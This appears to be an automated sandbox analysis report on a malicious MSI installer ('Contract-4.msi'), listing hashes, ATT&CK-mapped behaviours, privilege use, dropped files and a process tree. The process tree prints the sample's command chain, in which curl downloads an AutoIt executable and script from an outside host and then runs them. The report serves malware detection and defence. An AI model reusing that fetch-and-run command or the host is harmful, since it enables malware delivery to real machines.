ffd3edf21e63fee92fb9babbf56ccaddf2d78f58caeb6e6985a25aa4b8c519f1

Analysis

max time kernel
143s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
09/10/2023, 12:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Contract-4.msi
Size

660KB
MD5

1b6f948f740eb0426204a9b15472b194
SHA1

724912fd27e5f1c115144173d38d6ed27357a3e5
SHA256

ffd3edf21e63fee92fb9babbf56ccaddf2d78f58caeb6e6985a25aa4b8c519f1
SHA512

8cdab05208446915152808c114dc3942d3620572ef9aeb9acdd990f8f68a6401b2d88182804ead33fc832b32aed13b634925bbd672b534b0fa931b1704077f4b
SSDEEP

12288:3tvRQ+gjpjegGdo8rgLKxBTi9byLw2wHvHgU3qfrbDW:3tncpVGPrgtyLHw33qjbD

Score

8^/10

discovery

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
3404	KeyScramblerLogon.exe
3428	Autoit3.exe

Loads dropped DLL 3 IoCs

pid	Process
4572	MsiExec.exe
3404	KeyScramblerLogon.exe
3404	KeyScramblerLogon.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3608	ICACLS.EXE
1572	ICACLS.EXE

Blocklisted process makes network request 4 IoCs

flow	pid	Process
8	2904	msiexec.exe
11	2904	msiexec.exe
19	2904	msiexec.exe
21	2904	msiexec.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSID7A3.tmp	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	EXPAND.EXE
File opened for modification	C:\Windows\Installer\e57d5ce.msi	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{6830E210-51DD-45C8-B907-00E61B5696FD}	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	EXPAND.EXE
File created	C:\Windows\Installer\e57d5ce.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3860	3404	WerFault.exe	108

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000d5202569a554c8040000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000d52025690000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900d5202569000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dd5202569000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000d520256900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3792	msiexec.exe
3792	msiexec.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2904	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2904	msiexec.exe
Token: SeSecurityPrivilege	3792	msiexec.exe
Token: SeCreateTokenPrivilege	2904	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2904	msiexec.exe
Token: SeLockMemoryPrivilege	2904	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2904	msiexec.exe
Token: SeMachineAccountPrivilege	2904	msiexec.exe
Token: SeTcbPrivilege	2904	msiexec.exe
Token: SeSecurityPrivilege	2904	msiexec.exe
Token: SeTakeOwnershipPrivilege	2904	msiexec.exe
Token: SeLoadDriverPrivilege	2904	msiexec.exe
Token: SeSystemProfilePrivilege	2904	msiexec.exe
Token: SeSystemtimePrivilege	2904	msiexec.exe
Token: SeProfSingleProcessPrivilege	2904	msiexec.exe
Token: SeIncBasePriorityPrivilege	2904	msiexec.exe
Token: SeCreatePagefilePrivilege	2904	msiexec.exe
Token: SeCreatePermanentPrivilege	2904	msiexec.exe
Token: SeBackupPrivilege	2904	msiexec.exe
Token: SeRestorePrivilege	2904	msiexec.exe
Token: SeShutdownPrivilege	2904	msiexec.exe
Token: SeDebugPrivilege	2904	msiexec.exe
Token: SeAuditPrivilege	2904	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2904	msiexec.exe
Token: SeChangeNotifyPrivilege	2904	msiexec.exe
Token: SeRemoteShutdownPrivilege	2904	msiexec.exe
Token: SeUndockPrivilege	2904	msiexec.exe
Token: SeSyncAgentPrivilege	2904	msiexec.exe
Token: SeEnableDelegationPrivilege	2904	msiexec.exe
Token: SeManageVolumePrivilege	2904	msiexec.exe
Token: SeImpersonatePrivilege	2904	msiexec.exe
Token: SeCreateGlobalPrivilege	2904	msiexec.exe
Token: SeBackupPrivilege	1672	vssvc.exe
Token: SeRestorePrivilege	1672	vssvc.exe
Token: SeAuditPrivilege	1672	vssvc.exe
Token: SeBackupPrivilege	3792	msiexec.exe
Token: SeRestorePrivilege	3792	msiexec.exe
Token: SeRestorePrivilege	3792	msiexec.exe
Token: SeTakeOwnershipPrivilege	3792	msiexec.exe
Token: SeRestorePrivilege	3792	msiexec.exe
Token: SeTakeOwnershipPrivilege	3792	msiexec.exe
Token: SeBackupPrivilege	3512	srtasks.exe
Token: SeRestorePrivilege	3512	srtasks.exe
Token: SeSecurityPrivilege	3512	srtasks.exe
Token: SeTakeOwnershipPrivilege	3512	srtasks.exe
Token: SeBackupPrivilege	3512	srtasks.exe
Token: SeRestorePrivilege	3512	srtasks.exe
Token: SeSecurityPrivilege	3512	srtasks.exe
Token: SeTakeOwnershipPrivilege	3512	srtasks.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2904	msiexec.exe
2904	msiexec.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 3792 wrote to memory of 3512	3792	msiexec.exe	100
PID 3792 wrote to memory of 3512	3792	msiexec.exe	100
PID 3792 wrote to memory of 4572	3792	msiexec.exe	103
PID 3792 wrote to memory of 4572	3792	msiexec.exe	103
PID 3792 wrote to memory of 4572	3792	msiexec.exe	103
PID 4572 wrote to memory of 3608	4572	MsiExec.exe	104
PID 4572 wrote to memory of 3608	4572	MsiExec.exe	104
PID 4572 wrote to memory of 3608	4572	MsiExec.exe	104
PID 4572 wrote to memory of 3596	4572	MsiExec.exe	106
PID 4572 wrote to memory of 3596	4572	MsiExec.exe	106
PID 4572 wrote to memory of 3596	4572	MsiExec.exe	106
PID 4572 wrote to memory of 3404	4572	MsiExec.exe	108
PID 4572 wrote to memory of 3404	4572	MsiExec.exe	108
PID 4572 wrote to memory of 3404	4572	MsiExec.exe	108
PID 3404 wrote to memory of 4396	3404	KeyScramblerLogon.exe	109
PID 3404 wrote to memory of 4396	3404	KeyScramblerLogon.exe	109
PID 3404 wrote to memory of 4396	3404	KeyScramblerLogon.exe	109
PID 4396 wrote to memory of 2488	4396	cmd.exe	112
PID 4396 wrote to memory of 2488	4396	cmd.exe	112
PID 4396 wrote to memory of 2488	4396	cmd.exe	112
PID 4396 wrote to memory of 2220	4396	cmd.exe	114
PID 4396 wrote to memory of 2220	4396	cmd.exe	114
PID 4396 wrote to memory of 2220	4396	cmd.exe	114
PID 4396 wrote to memory of 3428	4396	cmd.exe	115
PID 4396 wrote to memory of 3428	4396	cmd.exe	115
PID 4396 wrote to memory of 3428	4396	cmd.exe	115
PID 4572 wrote to memory of 2172	4572	MsiExec.exe	118
PID 4572 wrote to memory of 2172	4572	MsiExec.exe	118
PID 4572 wrote to memory of 2172	4572	MsiExec.exe	118
PID 4572 wrote to memory of 1572	4572	MsiExec.exe	119
PID 4572 wrote to memory of 1572	4572	MsiExec.exe	119
PID 4572 wrote to memory of 1572	4572	MsiExec.exe	119

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Contract-4.msi
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2904

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3792
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3512
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 5B0BF255843FB3EF203E551F6415BB2D
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4572
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
    3⤵
    - Modifies file permissions
    PID:3608
- - C:\Windows\SysWOW64\EXPAND.EXE
    "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
    3⤵
    - Drops file in Windows directory
    PID:3596
- - C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\files\KeyScramblerLogon.exe
    "C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\files\KeyScramblerLogon.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3404
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c cd /d %temp% & curl -o Autoit3.exe http://piret-wismann.com:2351 & curl -o cztngt.au3 http://piret-wismann.com:2351/cztngt & Autoit3.exe cztngt.au3
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4396
    - - C:\Windows\SysWOW64\curl.exe
        
        curl -o Autoit3.exe http://piret-wismann.com:2351
        5⤵
        
        PID:2488
    - - C:\Windows\SysWOW64\curl.exe
        
        curl -o cztngt.au3 http://piret-wismann.com:2351/cztngt
        5⤵
        
        PID:2220
    - - C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
        
        Autoit3.exe cztngt.au3
        5⤵
        Executes dropped EXE
        Checks processor information in registry
        
        PID:3428
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3404 -s 404
      4⤵
      Program crash
      PID:3860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\files"
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\." /SETINTEGRITYLEVEL (CI)(OI)LOW
    3⤵
    - Modifies file permissions
    PID:1572

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3404 -ip 3404
1⤵
PID:2884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C42BC945025A34066DAB76EF3F80A05

Filesize
39KB

MD5
ac9cbdbc91959e9db6611dc0d38a5442

SHA1
5507e326ec8821c3edd262089c20245be0d75687

SHA256
46d56768c9e60bfdbc323a560e92551224ef82f919d3b63afbf3c82afa564985

SHA512
4f2720a86478bb32d9ba74d20f0acbe00f032400e4bbcd46486a18e854a0b7602cf08f3e1d36a018e818eb282ad7efb6ee95418739c5f9d2838707ed6bc0bad6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FE17BEC2A573BC9AE36869D0274FFA19_6DA81F04C5F9EAD2CD0268808FCE61E1

Filesize
727B

MD5
4e25d0434bd1f6cf35ee2c332255e571

SHA1
95a58811cbde3a2513d7fb8210e79545d45b8ab4

SHA256
8bc805fff18eda3d49a908d49f5659c07231e5bf0f4508019624b38a385a90f9

SHA512
09ef92c3f49ea82800bcd0b4fdcb6d7a5e559c9dad9bbdda139cbabef08907b89234026ece34f47e5626d5f56103220ac907ceda3c63b7eaab8933acbcf02e23

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C42BC945025A34066DAB76EF3F80A05

Filesize
314B

MD5
88c92ca9d3ddc043116f25137578dcd8

SHA1
428fc1e30c150fcfa384b9ea6b57acda6ca8cc26

SHA256
1dda4c22f1931472cef5482359cf1ceb27b0ab2b0e152db93e3b9d1f4e851e70

SHA512
dfd6a7820b5ab057f81406802dda0f34ed04463155102f6c0834927505bf81e7123f7722b974b4c39f19d02d6d677480bc7a0f2ec112f33f85d592b31d4f6ee8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FE17BEC2A573BC9AE36869D0274FFA19_6DA81F04C5F9EAD2CD0268808FCE61E1

Filesize
478B

MD5
bbbf9aa54c35873cf11638caed0f587d

SHA1
a2f386a1203f1afa10087dd695a9e9f2aace9d37

SHA256
c5e1beb6b0d63e3bf6f91a63a4bcd8fe440a66cd3adbecc0be9c11b77eba991c

SHA512
18aede6cbd4aa30de6e8ba6dd87079c082601e0f1f0674def7e4857219f46f19f59a994fcb98f04318194a2e4c45b96fcd5fc972f135080a71d1aea02d04ece7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\files.cab

Filesize
403KB

MD5
0c20650f04c9cf9f1ee4565de3f4f96d

SHA1
d679c0bd3c16c7114deafe9db8776da674b31cf0

SHA256
ebb29f7400503ad41a02f43a2847ac743a33f09c625e75503569bab56871cab8

SHA512
9cfcefd885b2c0688564ec26dbe6139d3910c2740b05b1b204476488fe3c3c5c1fcd6716f1c0e0bc5fdb483042bb73482f19772e012a6aed6845a500210a54c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\files\KeyScramblerIE.DLL

Filesize
454KB

MD5
9e0ae735a86eb8f0dc472f267ebbb74c

SHA1
53ff35f13620da5a432cd5dfac933749f070b74d

SHA256
6978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a

SHA512
b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\files\KeyScramblerIE.dll

Filesize
454KB

MD5
9e0ae735a86eb8f0dc472f267ebbb74c

SHA1
53ff35f13620da5a432cd5dfac933749f070b74d

SHA256
6978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a

SHA512
b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\files\KeyScramblerIE.dll

Filesize
454KB

MD5
9e0ae735a86eb8f0dc472f267ebbb74c

SHA1
53ff35f13620da5a432cd5dfac933749f070b74d

SHA256
6978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a

SHA512
b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\files\KeyScramblerLogon.exe

Filesize
500KB

MD5
c790ebfcb6a34953a371e32c9174fe46

SHA1
3ead08d8bbdb3afd851877cb50507b77ae18a4d8

SHA256
fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

SHA512
74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\files\KeyScramblerLogon.exe

Filesize
500KB

MD5
c790ebfcb6a34953a371e32c9174fe46

SHA1
3ead08d8bbdb3afd851877cb50507b77ae18a4d8

SHA256
fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

SHA512
74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\msiwrapper.ini

Filesize
458B

MD5
b111e0da1119fc7b137d676de5b60c0a

SHA1
93baabdea7656d9036f23724dde3c4b7baebe67d

SHA256
451eb73a53721d7bcec4cfd887f0621c83b595d881e98693ef70c0932a1129f8

SHA512
59871da18c7b97b947793df24a9c0e52477980b0e468dd6a74d252dfcb727aef7839775805507c32a39d5ade2f9aca0a2e6e03974d27fa2af9e424b29d929996

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\msiwrapper.ini

Filesize
1KB

MD5
ea00fed6d2bdeaad9b7ab660bad6c69c

SHA1
fd733ac6a50d956d0d0740cc04080e5e17967527

SHA256
774a783f3004c375fd5fa823bd6b3d904c8bcf67bcd473f639ab5cc17ddb54dd

SHA512
ce84f9353d2f16292da4e3a4aeae10bd46b0ef4672df8891eddbd97529d8af3af8ee426849b30636df529b47f65ed1c3b619369cd9dd7e7e731ceb7fc8dc389c

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-f437332f-578e-4635-baf7-295e18be67ba\msiwrapper.ini

Filesize
1KB

MD5
ea00fed6d2bdeaad9b7ab660bad6c69c

SHA1
fd733ac6a50d956d0d0740cc04080e5e17967527

SHA256
774a783f3004c375fd5fa823bd6b3d904c8bcf67bcd473f639ab5cc17ddb54dd

SHA512
ce84f9353d2f16292da4e3a4aeae10bd46b0ef4672df8891eddbd97529d8af3af8ee426849b30636df529b47f65ed1c3b619369cd9dd7e7e731ceb7fc8dc389c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cztngt.au3

Filesize
85KB

MD5
7d00d7b1509350ef42de43b28a2efeec

SHA1
a2deca1c9c48e0402d34ab9b66b63a335e827bf1

SHA256
4aea930309b590d34488187a8c9cb31b83ff1faa2ff4d27606e50fac3a0db742

SHA512
7597f436966a662451bc495ce7758f493af607479cf63ebc521a4a9f178f6ae9dd22b47e5953a0fa2780a695b021e6e4c5d58301053eed0778fd07f89876f625

Download Submit
C:\Windows\Installer\MSID7A3.tmp

Filesize
208KB

MD5
d82b3fb861129c5d71f0cd2874f97216

SHA1
f3fe341d79224126e950d2691d574d147102b18d

SHA256
107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

SHA512
244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

Download Submit
C:\Windows\Installer\MSID7A3.tmp

Filesize
208KB

MD5
d82b3fb861129c5d71f0cd2874f97216

SHA1
f3fe341d79224126e950d2691d574d147102b18d

SHA256
107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

SHA512
244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

Download Submit
C:\temp\njsswd

Filesize
380KB

MD5
b537196e2a994f2abca7c0b03bd137e0

SHA1
a99417120a1a5a600304df2eb1d8a90c62d81324

SHA256
bd1d18226a18b8e9eb3819f8e07ad1c205c0f3562f7eb70c4b70a69d92a3adc1

SHA512
85e0705bf2361e75ae2016c9417f95169007db950db8839ceb78fd504d89c9beedd92ee029f9f849602973534ca24d805e5ff1d34fdb31a50266ade6b526b989

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
23.0MB

MD5
2fc594ed096328addbf0a20693f0d72b

SHA1
994f9237f4ad9e44f585615ece881968e1f40216

SHA256
879ad68d5a05ec0b0933f44d74f02616e532aa242d4a1372d9514f8e8933475b

SHA512
ac0e31d59dddc333d69f1c65433bd4689af2941790ffb663ea5973457b4eb8337510ffb15f179ba4d2c60312479287f284544345d47db0de594655889d186354

Download Submit
\??\Volume{692520d5-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{3b50b18b-4920-4574-a007-62780ebe6d3b}_OnDiskSnapshotProp

Filesize
5KB

MD5
716f34c4a83efdc55a44c26d7d595761

SHA1
f854b0714321808f70ad855564146964ecdb17c9

SHA256
aa2a435a44c3a7415584ae014262825685a115fe3837bbd2e1fa585204ff91e1

SHA512
874d1e156807a8eb5df5c9bda17f1df21f27654b79136480df248e644f5fd1122d76bddc5f89877c81fab82d9939d8c5ed3d7615a2b0995ae10828751845adf8

Download Submit
memory/3404-92-0x00000000027F0000-0x00000000028F0000-memory.dmp

Filesize
1024KB

Download
memory/3404-90-0x0000000000F90000-0x0000000001006000-memory.dmp

Filesize
472KB

Download
memory/3404-111-0x00000000027F0000-0x00000000028F0000-memory.dmp

Filesize
1024KB

Download
memory/3404-112-0x0000000000F90000-0x0000000001006000-memory.dmp

Filesize
472KB

Download
memory/3428-100-0x0000000000DE0000-0x00000000011E0000-memory.dmp

Filesize
4.0MB

Download
memory/3428-107-0x0000000004B50000-0x0000000004D39000-memory.dmp

Filesize
1.9MB

Download
memory/3428-108-0x0000000004B50000-0x0000000004D39000-memory.dmp

Filesize
1.9MB

Download